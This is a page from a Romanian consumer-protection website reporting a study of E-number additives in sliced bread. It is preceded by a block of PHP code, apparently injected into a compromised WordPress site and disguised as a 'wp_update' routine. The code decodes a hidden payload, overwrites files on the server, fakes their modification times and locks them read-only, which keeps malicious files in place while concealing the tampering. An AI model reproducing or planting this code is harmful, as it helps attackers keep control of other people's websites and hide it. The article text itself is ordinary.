$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro – o9atitudine! Studiu comparativ pe paine din punct de vedere al numarului de E-uri continute! – O noua atitudine

     Astfel, rezultatele au fost cu atat mai interesante, cu cat painea este un element de care nu ne putem lipsi in viata de zi cu zi. Conform studiilor realizate in domeniu, aproximativ 90% dintre locuitorii Romaniei mananca zilnic paine. Fie ca o asociem cu mancare gatita, cu mezeluri sau pur si simplu, o mancam calda, painea este, cu siguranta, o emblema a romanilor.
     Peste 50% din sortimentele de paine feliata care se gasesc pe piata romaneasca contin E-uri. Mai mult, patru dintre produsele de panificatie studiate contin un numar de 8 E-uri. Exista totusi si un numar mare de produse care sunt fabricate fara E-uri.


     Ajuta-ne sa te ajutam!
     Descarca studiul integral de pe site-ul www.teste-comparative.ro, sectiunea “Studii” si verifica painea pe care o consumi. Profita de informatiile care iti sunt la indemana oricand, chiar pe eticheta, pentru a beneficia de produse conforme, achizitionate in cunostinta de cauza.  
     Pentru mai multe informatii despre acest studiu comparativ pe etichete privind numarul de E-uri continute de sortimentele de paine feliata de pe piata romaneasca, viziteaza pagina www.teste-comparative.ro sau scrie-ne pe adresa pr@protectia-consumatorilor.ro!

By o9admin